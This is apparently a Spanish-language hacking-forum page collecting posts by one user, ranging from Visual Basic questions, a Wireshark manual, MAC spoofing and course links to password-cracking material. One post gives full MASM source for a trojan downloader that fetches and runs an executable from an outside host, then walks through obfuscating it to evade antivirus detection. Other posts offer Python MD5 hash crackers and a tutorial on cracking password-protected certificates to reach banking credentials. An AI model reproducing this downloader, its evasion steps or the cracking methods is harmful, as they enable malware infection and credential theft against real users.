Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - [ANTRAX]

#1
Hola a todos, Bueno tengo una pregunta.
Si uso LIKE en un datagrid, funciona perfecto, ya que lo que escribo en un textbox, me lo muestra en la grilla.

El code que tengo en el datagrid es el siguiente:

Código (vb) [Seleccionar]
Private Sub txtSearch_Change()
sent = "SELECT * FROM stock WHERE Descripcion LIKE '" & txtSearch & "%" & "'"
Adodc1.RecordSource = sent
Adodc1.Refresh
End Sub


Lo que quiero hacer es que esto mismo funcione en un MSHFlexGrid

Espero que puedan ayudarme.
Saludos
#2
Hola a todos. Tengo una confusion con un codigo en VB.
Lo que necesito es un codigo de un lector de barras.
Osea que lea el codigo de barras por medio del lector y que coloque el codigo en un textbox.
Si alguien sabe como hacerlo se lo agradeceria mucho!
Saludos
#3
Criptografía / Crackeador MD5 por Fuerza bruta
7 Septiembre 2010, 21:27 PM
Aca les dejo este crackeador por fuerza bruta. Funciona de maravilla aunque no es muy rapido por el lenguaje. Quizas les sirva como ejemplo.

Modo de uso:

Cracker.py -t md5 -h e10adc3949ba59abbe56e057f20f883e -w 1234567890 -a 9 -i 3 -v

Comandos:

-t: Tipo de Hash
-h: Hash a Crackear
-w: Teclas a usar
-a: Maximo de Caracteres
-i: Minimo de Caracteres
-v: Modo Hacking


Código (python) [Seleccionar]

import sys , string , time
def main():
    "Main"
    title = "MD5 Cracker Brute Force"
    print "\n" + title.center(45) + "\n"
   
def usage():
    "Usage"
    print "[+] Ejemplo : Cracker.py -t md5 -h e10adc3949ba59abbe56e057f20f883e -w 1234567890 -a 9 -i 3 -v"

def usagelarge():
    "Usage Large"
    print "\n  Forma de Uso:"
    print "\n  [+]Ejemplo: Cracker.py -t md5 -h e10adc3949ba59abbe56e057f20f883e -w 1234567890 -a 9 -i 3 -v"
    print ""
    print "\t[Comandos]"
    print "\t   -t: Tipo de Hash"
    print "\t   -h: Hash a Crackear"
    print "\t   -w: Teclas a usar"
    print "\t   -a: Maximo de Caracteres"
    print "\t   -i: Minimo de Caracteres"
    print "\t   -v: Modo Hacking\n"

def timer():
    "Time"
    now = time.localtime(time.time())
    return time.asctime(now)

if '__main__' == __name__ :

    if len(sys.argv) <= 5:
        main()
        usagelarge()
        sys.exit(1)

    hhash = words = maxw = minw = typeh = ""
    verbose = 0

    for arg in sys.argv[1:]:
        try:
            if arg.lower() == "-v" or arg.lower() == "-verbose":
                    verbose = 1
            if arg.lower() == "-h" or arg.lower() == "-hash":
                    hhash = sys.argv[int(sys.argv[1:].index(arg))+2]
            if arg.lower() == "-a" or arg.lower() == "-max":
                    maxw = sys.argv[int(sys.argv[1:].index(arg))+2]
            if arg.lower() == "-i" or arg.lower() == "-min":
                    minw = sys.argv[int(sys.argv[1:].index(arg))+2]
            if arg.lower() == "-w" or arg.lower() == "-words":
                    words = sys.argv[int(sys.argv[1:].index(arg))+2]
            if arg.lower() == "-t" or arg.lower() == "-type":
                    typeh = sys.argv[int(sys.argv[1:].index(arg))+2]
        except(IndexError):
            print "[+] Comandos Obligatorios -t(Tipo de Hash) -h(Hash) -w(Teclas) -a(Maximo de teclas) -a(Minimo de teclas)"
            usage()
            sys.exit(1)

    if minw == "" : minw = '1'

    main()
    for args in (typeh, hhash, words, maxw, minw):
        try:
            if args != "":
                if args == typeh :
                    if typeh.lower() != 'md5' or 'sha':
                        if typeh.lower() == "md5" :
                            typeh = '1'
                            print "[+] Tipo de Hash : MD5"
                        elif typeh.lower() == "sha" :
                            typeh = '2'
                            print "[+] Tipo de Hash : SHA1"
                    else:
                        print "[+] Tipo Invalido de Hash"
                        sys.exit(1)
                if args == hhash :
                    if typeh == '1' :
                        if len(hhash) == 32 :
                            print "[+] MD5 Hash : " + hhash
                        else:
                            print "[+] Tipo Invalido de Hash"
                            sys.exit(1)
                    if typeh == '2' :
                        if len(hhash) == 40 :
                            print "[+] SHA1 Hash : " + hhash
                        else:
                            print "[+] SHA1 Invalido"
                            sys.exit(1)
                if args == words :
                    print "[+] Teclas a usar : " + words
                if args == maxw :
                    if maxw.isdigit() != False :
                        if int(maxw) >= 15 :
                            print "[+] Maximo de Digitos : 15 : " + maxw
                            sys.exit(1)
                        else:
                            if int(maxw) > int(minw):
                                print "[+] Maximo de Digitos : " + maxw
                            else:
                                print "[+] El Maximo de Digitos debe ser mayor al Minimo de Digitos"
                                sys.exit(1)
                    else:
                        print "[+] Maximo de Teclas = Digitos"
                        sys.exit(1)
                if args == minw :
                        if minw.isdigit() != False :
                            if int(minw) < int(maxw) :
                                print "[+] Minimo de Digitos : " + minw
                            else:
                                print "[+] El minimo de Digitos debe ser menor al maximo de Digitos"
                                sys.exit(1)
                        else:
                            print "[+] Minimo de Teclas = Digitos"
                            sys.exit(1)
            else:
                print "[+] Comandos Obligatorios -t(Tipo de Hash) -h(Hash) -w(Teclas) -a(Maximo de teclas) -a(Minimo de teclas)"
                usage()
                sys.exit(1)
        except(ValueError):
            print "[+] Formato de comandos erroneo"
            sys.exit(1)

    f = open("CRACK.py",'w')
    f.write("#!/usr/bin/env python\n")
    if (typeh == '1') : f.write("import sys , md5 , string , time\n")
    if (typeh == '2') : f.write("import sys , sha , string , time\n")
    tab = '\t'
    f.write("def timer():\n")
    f.write(tab + "now = time.localtime(time.time())\n")
    f.write(tab + "return time.asctime(now)\n")
    f.write("def crackhash():\n")
   
    i = 0 ; inwords = ""
    f.write(tab + "hashh = '" + hhash.lower() +"'\n")
    f.write(tab + "try:\n")
   
    #print words
    for i in words:
        if i == str(words[int(len(words)-1)]) :
            inwords += "'" + i + "'"
            break
        inwords += "'" + i + "',"
    #print inwords
   
    i = int(minw) ; iwords = "" ; a = 0
   
    while (int(i) != int(maxw) + 1) :

        for a in range(i):
            if int(i) != (int(a) + 1):
                iwords += "i" + str(i) + str(a) + " + "
            else:
                 iwords += "i" + str(i) + str(a)

            data = (int(a + 2) * tab + "for i" + str(i) + str(a) + " in (" + inwords + "):\n")
            f.write(data)

        f.write(int(i + 2) * tab + "word = '' ; value = ''\n")
        f.write(int(i + 2) * tab + "word = " + iwords + "\n")
       
        if typeh == '1' : f.write(int(i + 2) * tab + "hash = md5.new()\n")

        if typeh == '2' : f.write(int(i + 2) * tab + "hash = sha.new()\n")

        f.write(int(i + 2) * tab + "hash.update(str(word))\n")
        f.write(int(i + 2) * tab + "value = hash.hexdigest()\n")
        if verbose == 1 : f.write(int(i + 2) * tab + "print " + iwords + ' + " : " + str(value)\n')
        f.write(int(i + 2) * tab + "if str(hashh) == str(value):\n")
        f.write(int(i + 3) * tab + "raise Exception\n")
        iwords = ""
        i += 1

    f.write(tab + "except(Exception):")
    f.write('\n'+ 2 * tab + "print '********************  Hash Crackeado ' + 20 * '*'")
    f.write('\n' + 2 * tab + "print '[+] HASH :', hashh")
    f.write('\n' + 2 * tab + "print '[+] PASS :', str(word)")
    f.write('\n' + 2 * tab + "print '[+] Hora de finalizacion :', timer()")
    f.write('\n' + 2 * tab + "sys.exit(1)")
    f.write('\n' + tab + "except(KeyboardInterrupt):")
    f.write('\n' + 2 * tab + "print '[+] Process Ended ',timer()")
    f.write('\n' + 2 * tab + "sys.exit(1)")
    f.write("\ncrackhash()")
    f.close()

    print '[+] Hora de inicio : ', timer()
   
    import CRACK
    CRACK.crackhash()




Saludos!
#4
Scripting / Crackeador MD5 por Diccionario [PYTHON]
3 Septiembre 2010, 16:11 PM
Hola gente, les vengo a dejar este sencillo code en Python, es un crackeador por MD5 que funciona con diccionario.

Modo de uso:

Cracker.py [HASH (MD5)] [Diccionario]

Ejemplo:

Cracker.py e10adc3949ba59abbe56e057f20f883e diccionario.txt

Nota: el diccionario debe estar en el mismo directorio que el crackeador.

Código (python) [Seleccionar]
import md5, sys, getopt
ver= "1.0"
a=0
def run():

if len(sys.argv) == 1 or sys.argv[1]=="-h" or sys.argv[1]=="--help":

print ""
print ""
print "ANTRAX"
print "WWW.ELHACKER.NET"
print ""
print "Modo de uso: Cracker.py [HASH (MD5)] [Diccionario]"
print ""
print "Ejemplo: Cracker.py e10adc3949ba59abbe56e057f20f883e diccionario.txt"
print ""

else:
if sys.argv[1]=="-v" or sys.argv[1]=="--version":
print "Cracker version: " + ver + "\nAutor: ANTRAX"


if len(sys.argv) == 3:
   md5crack(sys.argv[1],sys.argv[2],)


def md5crack(hash,word):
try:
wordlist = open(word,"r")
except IOError:
print "Diccionario: " + word + " No Existe"
sys.exit(0)

global a

for line in wordlist.xreadlines():
word= line.replace("\n","")
passw = md5.new(word)

if (hash == passw.hexdigest()):
print ""
print "Password Crackeada!"
print 'MD5: ' + passw.hexdigest() + ' ---> ' + word+''
print "BY ANTRAX"
a = 1
sys.exit(0)

if ( a == 0):
print 'Password no Encontrada en este diccionario'
wordlist.close()

def main():
run()


if __name__ == "__main__":
   main()


Saludos!

ANTRAX
#5
Redes / Manual Wireshark
29 Agosto 2010, 18:08 PM

¿Que es Wireshark?

Wireshark, es un analizador de protocolos utilizado para realizar análisis y solucionar problemas en redes de comunicaciones para desarrollo de software y protocolos, y como una herramienta didáctica para educación.
Su función es similar a la de *tcpdump, pero añade una interfaz gráfica y opciones de organización y filtrado de información. Así, permite ver todo el tráfico que pasa a través de una red estableciendo la configuración en modo promiscuo.
En la siguiente explicación veremos como funciona más detalladamente.

-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·--·-·-·-·-

Manual Wireshark

1.- Cuando abrimos por primera vez el programa se muestra y detalla la interfaz de usuario y como se aplican las principales funciones de WireShark (Capturar, Desplegar y Filtrar paquetes).


File -> contiene las funciones para manipular archivos y para cerrar la aplicación Wireshark.
Edit -> este se puede aplicar funciones a los paquetes, por ejemplo, buscar un paquetes especifico, aplicar una marca al paquete y configurar la interfaz de usuario.
View -> permite configurar el despliegue del paquete capturado.
Go -> Desde aquí permiten ...
Capture -> para iniciar y detener la captura de paquetes.
Analyze -> desde analyze podemos manipular los filtros, habilitar o deshabilitar protocolos, flujos de paquetes, etc.
Statistics -> podemos definir u obtener las estadísticas del trafico capturado.
Help -> menú de ayuda.

A continuación empezaremos con la aplicación más sencilla que podemos utilizar en el programa.


Capturar paquetes IP

WireShark cuenta con tres maneras para iniciar la captura de los paquetes:

·Haciendo doble clic en se despliega una ventana donde se listan las interfaces locales disponibles para iniciar la captura de paquetes.


Tres botones se visualizan por cada interfaz

Start -> para iniciar
Options -> para configurar
Details -> proporciona información adicional de la tarjeta como su descripción, estadísticas, etc.

Otra opcion es Otra seleccionar el icono en la barra de herramientas, y abrimos la siguiente ventana donde se muestra opciones de configuración para la tarjeta de red.


O por ultimo en el caso que se haya predefinido las opciones de la tarjeta, haciendo clic en se inicia la captura de paquetes inmediata.

Capture/start


Cuando pulsamos a start nos muestra esta pantalla.


La información se organiza de la siguiente forma.
primera columna[N.o]-> muestra el número de paquetes que enviamos o recibimos.
Segunda columna[Time] ->s el tiempo que tarda en transmitirse el paquete de datos.
Tercera columna[Source]-> la ip origen.
Cuarta columna[Destination]-> la ip destino.
Quinta columna[Protocol]-> El protocolo que utiliza en esa transmisión (especificaciones pag..)
Sexta columna[info.]-> Nos muestra una pequeña información sobre el paquete de datos.
En la parte que he señalado en azul-> Contiene el protocolo y los campos correspondientes del paquete previamente seleccionado en el panel de paquetes capturados[Gris]. Seleccionando una de estas líneas con el botón secundario del Mouse se tiene opciones para ser aplicadas según las necesidades.


En la parte que he señalado en amarillo-> En este panel se despliega el contenido del paquete en formato hexadecimal.


Wireshark tiene otra funcion importante y es la campura de paquetes pero con filtrado.

Filtrar paquetes IP.

Para guardar o abrir un filtro existente se debe seleccionar Display Filter en el menú Analyze o Capture Filter que se encuentra en el menú Capture.

Capture/filter


Para definir un filtro pulsamos un nombre de la lista que tenemos y solo nos filtrara aquello que allamos seleccionado

Analizando un paquete.

El paquete que voy a analizar va a ser un envio de trafico Ping.
cmd-> ping 192.168.2.21 [cualquier ip]


En la captura vemos que al hacer ping tenemos dos clases de protocolos diferentes: ARP y ICMP.
ARP -> para poder llegar al nodo correspondiente se necesita que la tabla ARP se rellene y mas tarde el ping se ara correctamente.
ICMP -> en lo que vemos que corresponde al protocolo ICMP es los ping que se han hecho a un nodo.
Mediante ping comprobamos la correcta conectividad entre equipos. Observamos que en la columna de info pone request y replay. La línea de request la enviamos desde nuestro nodo y replay es la contestación a nuestra trama.

Al programa lo pueden descargar de aca: WIRESHARK

Espero que les sea de utilidad!

Saludos!

ANTRAX
#6
¿Que es un certificado digital?

[WIKIPEDIA]

Un Certificado Digital es un documento digital mediante el cual un tercero confiable (una autoridad de certificación) garantiza la vinculación entre la identidad de un sujeto o entidad y su clave pública.

Si bien existen variados formatos para certificados digitales, los más comúnmente empleados se rigen por el estándar UIT-T X.509. El certificado contiene usualmente el nombre de la entidad certificada, número de serie, fecha de expiración, una copia de la clave pública del titular del certificado (utilizada para la verificación de su firma digital) y la firma digital de la autoridad emisora del certificado de forma que el receptor pueda verificar que esta última ha establecido realmente la asociación.

En otras palabras, los certificados digitales suelen tener usuarios y contraseñas importantes, como lo son usuarios y contraseñas bancarias.

pero esto no es tan facil. Estos certificados vienen protegidos con contraseña.

----------------

En este tuto les enseñare a crackearlos para poder acceder a esa informacion.

lo primero que necesitaremos sera un Crackeador llamado Cracker12 que solo corre en Windows

lo pueden descargar de su pagina oficial en sus dos idiomas, Ingles y Español

Descarga: CRACKER12

una vez descargado lo descomprimimos.

NOTA: ESTE CRACKEADOR FUNCIONA SOBRE LA SHELL DE WINDOWS [DoS]

Entonces para hacerlo correr vamos a:

INICIO>EJECUTAR>CMD

una vez abierta la consola, escribimos lo siguiente:

D:\brute12>brute12.exe certificado.pfx diccionario.txt

En este caso seleccione la carpeta de donde se encuentra el crackeador en mi PC.

el certificado y el diccionario deben estar en el mismo directorio.

una vez escrito, le damos a Enter, y comenzara a crackear.

nos saldra algo como esto mientras crackea:

[*]Start
The current date/time is: Mon Mar 31 12:43:12 2008
Words tested: 1000
The current date/time is: Mon Mar 31 12:43:14 2008
Words tested: 2000
The current date/time is: Mon Mar 31 12:43:16 2008
Words tested: 3000
The current date/time is: Mon Mar 31 12:43:17 2008


Esto quiere decir que esta probando con todas las palabras de nuestro diccionario.

este proceso seguira hasta que termine y encuentre a el pass. dira algo como esto:

PKCS12 Deciphered !!
password:ANTRAX
The current date/time is: Mon Mar 31 12:44:59 2008


Espero que les haya gustado y les sirva

NOTA: Ni el foro ni yo nos hacemos cargo del mal uso que se le pueda llegar a dar.

Saludos!

ANTRAX
#7
Existen muchos procedimientos para cambiar la MAC Address de una PC.
Pasare a explicar uno muy sencillo.

  • Primero que nada necesitaremos el EtherChange

    Descarga oficial: http://www.ntsecurity.nu/downloads/etherchange.exe
    Mirror: http://elgeek.com/files/etherchange.exe


  • Ahora se procede a ejecutar el programa, y tendremos algo asi:


    1. Seleccionamos el adaptador de red correspondiente (placa de red).
    2. Tipeamos "1? para especificar una nueva dirección ethernet, o sea MAC Address.
    3. Escribimos la nueva MAC Addres sin comas, guiones o cualquier tipo de separadores.

    Listo! Ahora solo resta reiniciar el ordenador para habilitar la nueva MAC Address.


    =======================


  • Ahora procedere a explicar otra alternativa.

    1. Vamos al [Panel de Control] de Windows –> [Conexiones de red].
    2. Hacemos doble click en nuestra conexión (usualmente llamada "Conexión de red de área local ...") .
    3. Click en Propiedades y luego en Configurar


    4. Luego vamos a la pestaña Avanzada u Opciones Avanzadas.
    5. Dentro de la pestaña buscamos el campo "Network Address" y especificamos el valor hexadecimal que tendrá como dirección MAC nuestra placa.

    El problema de este último método es que no todas las placas de red nos permiten modificar el MAC Address

  • Ni el foro ni yo nos hacemos responsables del mal uso que se le pueda llegar a dar.

    Saludos a todos!

    ANTRAX
#8
[Curso C++ Completo]


Completo VideoTutorial de C ++, un curso muy bueno, esencial para principiantes hasta nivel intermedio.


Contenido:

* Una Breve Historia Popular
* Video Tutorial de C++. Programación Orientada a Objetos. Una breve historia de C++; Evolución de C++; ¿Debo aprender C primero?; C++, Java y C#; Managed
Extensión de Microsoft para C++; El Estándar ANSI; El entorno de desarrollo; El Proceso de creación de un Programa; Primer Programa C++; Trabajar con el
Compilador
* C++. Análisis de un Programa
* C++. Trabajar con Variables
* C++. Trabajar con Constantes
* C++. Crear expresiones y declaraciones
* C++. Trabajar con Condicionales
* C++. Operadores Lógicos
* C++. Organizar con Funciones
* C++ Variables Locales y Globales
* C++ Polimorfismo Funcional, etc..


Download:
http://rapidshare.com/files/71829900/C_plus_plus_Bypriale_.part01.rar
http://rapidshare.com/files/71840614/C_plus_plus_Bypriale_.part02.rar
http://rapidshare.com/files/71851327/C_plus_plus_Bypriale_.part03.rar
http://rapidshare.com/files/71861314/C_plus_plus_Bypriale_.part04.rar
http://rapidshare.com/files/71969804/C_plus_plus_Bypriale_.part05.rar
http://rapidshare.com/files/71987718/C_plus_plus_Bypriale_.part06.rar
http://rapidshare.com/files/72000816/C_plus_plus_Bypriale_.part07.rar
http://rapidshare.com/files/72016142/C_plus_plus_Bypriale_.part08.rar
http://rapidshare.com/files/72025550/C_plus_plus_Bypriale_.part09.rar

==========================

Mirror:

http://rapidshare.com/files/247388346/cpp001.avi
http://rapidshare.com/files/247392056/cpp002.avi
http://rapidshare.com/files/247420505/cpp003.avi
http://rapidshare.com/files/247428656/cpp004.avi
http://rapidshare.com/files/247435951/cpp005.avi
http://rapidshare.com/files/247436819/cpp006.avi
http://rapidshare.com/files/249876673/cpp007.avi
http://rapidshare.com/files/249876730/cpp008.avi
http://rapidshare.com/files/249876073/cpp009.avi
http://rapidshare.com/files/249876222/cpp010.avi
http://rapidshare.com/files/249876231/cpp011.avi
http://rapidshare.com/files/249876845/cpp012.avi
http://rapidshare.com/files/249876074/cpp013.avi
http://rapidshare.com/files/249876106/cpp014.avi
http://rapidshare.com/files/250253627/cpp015.avi
http://rapidshare.com/files/250253691/cpp016.avi
http://rapidshare.com/files/250253744/cpp017.avi
http://rapidshare.com/files/252534955/cpp18.avi
http://rapidshare.com/files/250253617/cpp019.avi
http://rapidshare.com/files/252547323/cpp020.avi
http://rapidshare.com/files/252548758/cpp021.avi
http://rapidshare.com/files/250253863/cpp022.avi
http://rapidshare.com/files/253712342/cpp023.avi
http://rapidshare.com/files/253713688/cpp024.avi
http://rapidshare.com/files/253721882/cpp025.avi
http://rapidshare.com/files/253727758/cpp026.avi
http://rapidshare.com/files/253734573/cpp027.avi
http://rapidshare.com/files/247410913/cpp_028.avi
http://rapidshare.com/files/247391847/cpp_029.avi
http://rapidshare.com/files/247379934/PRACTICAS.rar

Saludos!

ANTRAX
#9

Videotutorial 1. Lenguaje Ensamblador.

Damos inicio a este curso el cual esta enfocado a la Programacion en Lenguaje Ensamblador, y empezamos con una introduccion, en la cual se definiran conceptos muy basicos pero muy importantes para aprender a programar en este lenguaje.

Videotutorial 2. Lenguaje Ensamblador.

Videotutorial No. 2 del curso de Programacion en Lenguaje Ensamblador. Empezamos a ver mas a fondo la Arquitectura interna del microprocesador, y definimos detalles importantes que se deben saber antes de programar y porque programar determinado procesador.


Videotutorial 3. Lenguaje Ensamblador.

Videotutorial No. 3 del curso de Programacion en Lenguaje Ensamblador. Ultimo Video en el cual se trata teoria e introduccion. El tema a tratar son los registros del Microprocesador, ya que estos son muy importatantes para la programacion con el ensamblador. Estos registros son los que por medio del lenjuaje ensambldor nos van a permitir manipular (dar ordenes), al microprocesador. Cabe destacar que este curso tambien lo podras orientar, a la programacion de microcontroladores, ya que estos tambien utilizan registros para ser programados.


Videotutorial 4. Lenguaje Ensamblador.

Videotutorial No. 4 del curso de Programacion en Lenguaje Ensamblador, en el que se trataran los siguientes temas: Manejo de memoria en Ensamblador, Modos de direccionamiento, La instruccion MOV, Instalacion de los programas (Masm ', 'Videotutorial No. 4 del curso de Programacion en Lenguaje Ensamblador, en el que se trataran los siguientes temas: Manejo de memoria en Ensamblador, Modos de direccionamiento, La instruccion MOV, Instalacion de los programas (Masm 'Tasm).


Videotutorial 5. Lenguaje Ensamblador.

En este VideoTutorial de Ensamblador numero 5, conoceremos mas a fondo las interrupciones, ya que es indispensable saber para que sirven cada una de ellas, conocer cada uno de sus elementos por los cuales estan conformadas y saber como emplearlas en el lenguaje ensamblador.
Ademas que haremos unos ejercicios, en los cuales aplicaremos dichas Interrupciones. En este Video repasaremos la maquetacion de un programa en ensamblador y lo explico de una forma mas detallada.
Crearemos nuestras funciones, para posicionar en un lugar determinado un texto, ya intecractuaremos con el usuario.
Apartir de este videotutorial ya podras emplear tus conocimientos para comprender el ensamblador para la programacion de microcontroladores.
(Ojo ) Emplearlo como analisis y comprender la logica, no para programar a un microcontrolador ya que para eso necesitas conocimientos mas avanzados con respecto a conocer mas afondo la arquitectura del mismo. Si Dios me lo permite en este curso se abarcara la programacion de Microcontroladores Pic.

Videotutorial 6. Programacion en Ensamblador.

Videotutorial numero 6 del curso de programacion en Lenguaje Ensamblador, donde trabajaremos con Etiquetas, veremos el manejo y las reglas de implementacion de las mismas. Ademas conoceremos algunas instrucciones de salto, estos se complementan con lo mencionado anteriormente es decir con las etiquetas, ya que trabajan a la par. Se vera tambien algunas intrucciones de salto condicional, parecidas a las estructuras condicionales del Lenguaje C, como lo son If - Else, leeremos datos introducidos por el usurio atravez del teclado, y realizaremos comparaciones con instrucciones que nos provee este lenguaje. Simularemos un ciclo While con las herramientas mencionadas anteriormente.

Videotutorial 7. Programacion en Ensamblador.

Videotutorial 7. del curso en Programacion en Ensamblador. Seguimos trabajando con la implementacion de etiquetas, las instrucciones de compracion, instrucciones de salto incondicional y las instrucciones de salto condicional como lo son JA, JB, del ensamblador, y vemos como trabajan al igual que las sentencias de condicion del lenguaje C, como las instrucciones if - else. Todo en cojunto nos ayuda a relizar un programa en el cual se le pide al usuaio que introduzca 2 valores desde el teclado y este programa nos dira cual es el valor mayor, menor o si son iguales. Este ejemeplo esta realizado en el compilador TASM version 5, pero pueden tambien pueden emplearlo en el compilador MASM.



Fuente: Video-Cursos


Un saludo a todos!

ANTRAX

#10
1. INTRODUCCION:
Hola a todos, soy ANTRAX. Esta vez les enseñare a "modificar"
nuestras Notebooks para que tengan mayor alcance WIFI.
No me hago responsable de los daños que hagan con sus Notebooks.
Los materiales que utilice fueron los siguientes:
- Destornillador
- Soldador de estaño
- Estaño
- Pinzas
- Cable fino
- Cinta aisladora
- Un recipiente para poner los tornillos que sacaba
- Conector RP-SMA / Pigtail
2. DESARMADO:
Bueno, lo primero que necesitamos es tener el conector RP-SMA.
Pueden conseguirlo en cualquier tienda de electrónica.
Yo por ejemplo, se lo saque a un router que mi padre tenía tirado
en su cementerio de computadoras.


Desarme el router y desoldé el conector.


Una vez que tenemos el conector, procedemos al desarmado de la
Notebook.


Tiene varios tornillos, es por eso que los fui guardando en un
pequeño recipiente para no extraviarlos.
3. ARMADO
Una vez que quitamos los tornillos, debemos ubicar la placa de red
inalámbrica.
Dicha placa tiene dos entradas/salidas, AUX y MAIN.
Lo que debemos hacer es soldar un cable al MAIN.



Como pueden ver en la imagen, el cable debe ser lo suficientemente
largo para que llegue hasta donde quieran sacar la antena


En mi caso lo sacare por uno de los costados de la pila.
Con el soldador de estaño hice un hueco lo suficientemente grande
como para que salga el conector.


Como pueden ver, ahí quedo colocado el conector, y el cable blanco
lo acomode por el costado de forma prolija.
Armamos todo y listo!
Les dejo unas imágenes de cómo me quedo a mi.





Espero que les haya gustado.
Con esto podrán tener mayor alcance en lo que respecta a redes
inalámbricas.
Esta es una antena estándar que venía con el router. Ustedes pueden
construir sus propias antenas que es fácil de hacer.

Un saludo a todos los lectores

ANTRAX
#11
En este post vamos a ver cuán sencillo es hacer indetectable un troyano. Cogeremos el más simple posible, Troyan.Downloader, un pequeño programa que se baja un exe de una página web y lo ejecuta con CreateProcess.

Éste es el código fuente original, que compila bajo masm32:

Código (asm) [Seleccionar]
.386
.model flat, stdcall ; 32 bit memory model
option casemap :none ; case sensitive

include \MASM32\INCLUDE\windows.inc
include \MASM32\INCLUDE\kernel32.inc
include \MASM32\INCLUDE\urlmon.inc
include \MASM32\INCLUDE\shell32.inc

includelib \MASM32\LIB\kernel32.lib
includelib \MASM32\LIB\urlmon.lib
includelib \MASM32\LIB\shell32.lib

; #########################################
.data
web db "http://mitroyano.com/test.exe",0
open db "open",0
dir db "test.exe",0 (0) ; buffer for command line
pinfo dd 4 dup (0) ;process handles
startupinfo db 48h dup (0) ;startup info for the process were opening

.code

start:
push NULL
push 0
push offset dir
push offset web
push NULL
CALL URLDownloadToFile

push offset pinfo
push offset startupinfo
push NULL
push NULL
push NULL
push TRUE
push NULL
push NULL
push NULL
push offset dir ; Pointer to name of executable mod
call CreateProcessA

push 0
call ExitProcess

end start

; ####################


He marcado en negrita las tres cosas que son importantes en cuánto a comportamiento vírico se refiere:

(1) un string de una web de dónde se descarga el exe: http://...
(2) la llamada a URLDownloadToFile
(3) la llamada a CreateProcess.

Éste es el análisis del virus antes de modificarlo.


Por cierto, ya es bastante grave que antivirus como F-PROT, AVG, bitdefender no cataloguen correctamente nuestro troyano. Pero sigamos.



Ahora haremos un pequeño cambio. Subsituiremos http por wttp y restauraremos el string al principio del programa:




Código (asm) [Seleccionar]
web DB "wttp://mitroyano.com/troyano.exe", 0
[...]
Lea Eax, [web]
Mov Byte Ptr [Eax], 'h'


Con esto, nos quitamos de encima uno de los antivirus (avira). Aquí tenéis el análisis.

http://scanner.novirusthanks.org/analysis/e97f5f997c712b39eb038b03db949d7c/UHJveWVjdG8xLmV4ZQ==/

Nuestro siguiente paso va a ser quitar esa llamada tan fea que tenemos a
URLDownloadToFile, que canta muchísimo. ¿Cómo? Pues simplemente vemos con un debugger la primera instrucción que ejecuta la función, que en este caso es mov edi, edi, la copiamos en nuestro programa y luego llamamos a la API con un call eax:

Código (asm) [Seleccionar]
Push NULL
Push 0
push offset dir
push offset web
Push NULL
;Call URLDownloadToFile
Mov Edi, Edi
Mov Eax, URLDownloadToFile
Inc Eax
Inc Eax
Call Eax

Notar que hemos puesto dos inc eax porque la longitud de la instrucción mov edi, edi es dos.

Después de tan complicado cambio, el resultado es que tan sólo Dr.Web lo detecta. ¿Análisis heurístico? ¿Sandboxes? Mejor no digo nada ...


Fuente:
http://hacking-avanzado.blogspot.com
#12

Les hice un tutorial bien completo con imagenes sobre como instalar VirtualBox, Como configurarlo, como ponerle internet y como pasar archivos de la PC real a la Virtual.

Espero que les sea de su agrado y se que a muchos les servira para testear archivos y realizar sus mods.

http://www.4shared.com/document/6UmavC6a/Instalacion_y_Configuracion_de.html